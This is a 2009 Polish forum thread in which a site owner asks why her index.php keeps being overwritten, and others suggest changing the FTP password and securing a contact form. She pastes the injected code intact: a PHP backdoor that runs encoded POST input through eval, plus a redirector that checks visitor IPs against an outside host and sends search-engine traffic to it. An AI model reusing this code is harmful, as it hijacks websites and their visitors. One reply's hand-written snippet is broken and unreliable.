Problem z index.php- spam albo wlam.. Opcje

[mika]

Witam.. od wczoraj mam dosc powazny problem. Mam plik index.php ktory rozszerzenie php ma tylko dlatego żeby dzialał licznik w PHP. Strona to http://niekochane.org
I problem jest taki ze od soboty ktoś lub coś zmienia zawartość mojego pliku index.php na taką:

Kod

<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Nie wiem co z tym zrobić, już drugi raz mi sie zmieniła zawartość pliku i musiałam nadpisać, ale przecież nie mogę chyba ciągle nadpisywać, chciałabym jakoś temu zapobiec.
Na php prawie wcale sie nie znam a licznik znalazłam w sieci, na jakiejś polskiej stronie o php.
Plik index.php ma uprawnienia 644.

Czy ktoś może spotkał się z czymś takim, czy ktoś wie jak temu zapobiec?

Ten post edytował mika 12.01.2009, 09:45:14

[Pilsener]

Daj kod oryginalnego pliku (tego licznika), bo to on powoduje problem - i użyj odpowiedniego bbcode.

[mika]

Witaj, kod licznika jest taki:

[PHP] pobierz, plaintext 
<?php
function polnoc() /* odmierza ile sekund od danej chwili jest do konca dnia*/
{
   $teraz = date("H:i:s");
   $czas = explode(":", $teraz);
   $godziny = 23-$czas[0];
   $minuty  = 59-$czas[1];
   $sekundy = 59-$czas[2];
   $waznosc = $godziny*3600 + $minuty*60 + $sekundy;
   return $waznosc;
}
 
        if((!isset($_COOKIE['licznik'])) && (!strstr($_SERVER['HTTP_REFERER'], "niekochane.org")))
        {
               
                $plik = fopen("licznik.txt", "r");
                $tekst = fread($plik, filesize("licznik.txt"));
                $dane = explode(";", $tekst);
                fclose($plik);
                $plik = fopen("licznik.txt", "w");
                flock($plik, 2);
                $dane[0]++;
                fwrite($plik, "$dane[0];", 15);
                flock($plik, 3);
                fclose($plik);
               
         /*LICZNIK DZIENNY - MADE BY WOWO */
        $data = date("Y-m-d"); /*zmienna przechowująca dzisiejszą datę*/
        $dzienny=fopen("dzienny.txt","r"); /*otwieramy plik, plik jest formatu yyyy-mm-dd:liczba:yyyy-mm-dd:liczba, gdzie pierwsza data jest data dzisiejsza, pierwsza liczba liczbą odwiedzin dzisiaj, druga data, to data wczorajsza, druga liczba to liczba odwiedzin wczoraj*/
        $dzienny_tekst =fread($dzienny, filesize("dzienny.txt")); /*czytamy caly plik do zmiennej dzienny_tekst*/
        $dane2 = explode(":", $dzienny_tekst); /*rozbijamy wczytany tekst z pliku, na daty i liczby klikniec - calosc bedzie w tabeli*/
        fclose($dzienny); /*zamykamy plik, ktory otwarlismy tylko do odczytu*/
       
        if($dane2[0]==$data) /*jesli w pierwsza data w pliku jest data dzisiejsza to dzialamy jak nizej*/
      { $dane2[1]++; /*zwiekszamy liczbe klikniec dzisiaj*/
                $dzienny=fopen("dzienny.txt","w"); /*otwieramy plik do zapisu*/
                flock($dzienny, 2); /* blokujemy plik przed zapisem*/
                fwrite($dzienny, "$dane2[0]:$dane2[1]:$dane2[2]:$dane2[3]", 30); /*zapisujemy calość do pliku */
          flock($dzienny, 3); /* odblokowujemy plik */
          fclose($dzienny);   /* zamykamy plik */
        }
        else/* jeśli pierwsza data w pliku nie jest dzisiejszą datą */
        { $dane2[2]=$dane2[0]; /* druga date w pliku ustawiamy, ta ktora byla do tej pory pierwsza*/
          $dane2[3]=$dane2[1]; /* druga liczbe odwiedzin ustawiamy, ta ktora byla do tej pory pierwsza*/
          $dane2[0]=$data; /* ustawiamy pierwsza date w pliku na date dzisiejsza*/
          $dane2[1]=1; /* liczbe klikniec ustawiamy na 1 bo sa to pierwsze odwiedziny tego dnia*/
          $dzienny=fopen("dzienny.txt","w"); /*otwieramy plik do zapisu*/
          flock($dzienny, 2); /*blokada zapisu*/
          fwrite($dzienny, "$dane2[0]:$dane2[1]:$dane2[2]:$dane2[3]", 30); /*zapisujemy calość do pliku */
          flock($dzienny, 3);/* odblokowujemy plik */
          fclose($dzienny);/* zamykamy plik */
        }
               
               
         setcookie("licznik", "zliczono", time()+polnoc()+1 ); /* cookie blokuje licznik do konca doby */
        }else{
           
                $plik = fopen("licznik.txt", "r"); /* obsluga licznika stalego*/
                $tekst = fread($plik, filesize("licznik.txt"));
                $dane = explode(";", $tekst);
                fclose($plik);
               
                $dzienny=fopen("dzienny.txt","r"); /* obsluga licznika dziennego*/
                $dzienny_tekst =fread($dzienny, filesize("dzienny.txt"));
                $dane2 = explode(":", $dzienny_tekst);
                fclose($dzienny);
        }
?>
[PHP] pobierz, plaintext 

dobrego bbcode uzylam? mam tam jeszcze maly formularz kontaktowy, ktory jest wstawiany przez funkcje include - ten do zapisywania sie do listy oczekajacycj na male koty

[Lukez]

ja bym do odczytywania zawartosci licznika użył coś takiego:

<?
if(file_exists("licznik.txt"))
{
$sciezka = "licznik.txt";
$plik = fopen($sciezka, "r");
$zawartosc = fread($plik, filesize("licznik.txt"));
fclose);
}
else
echo $zawartosc
?>

Nie wiem czy wszystko jestdobrze, bo pisalem od reki

Ten post edytował Lukez 12.01.2009, 13:35:09

[wookieb]

A zmien haslo do ftp i zobacz czy problem bedzie sie powtarzal.

[Pilsener]

Nie widać w tym liczniku nic takiego, co mogłoby powodować taki problem.

mam tam jeszcze maly formularz kontaktowy, ktory jest wstawiany przez funkcje include

- i pewnie przez ten formularz kod dostaje się do strony. Każdy formularz nalezy dobrze zabezpieczyć, gdyż jest to zawsze słaby punkt i potencjalna furtka do ataku.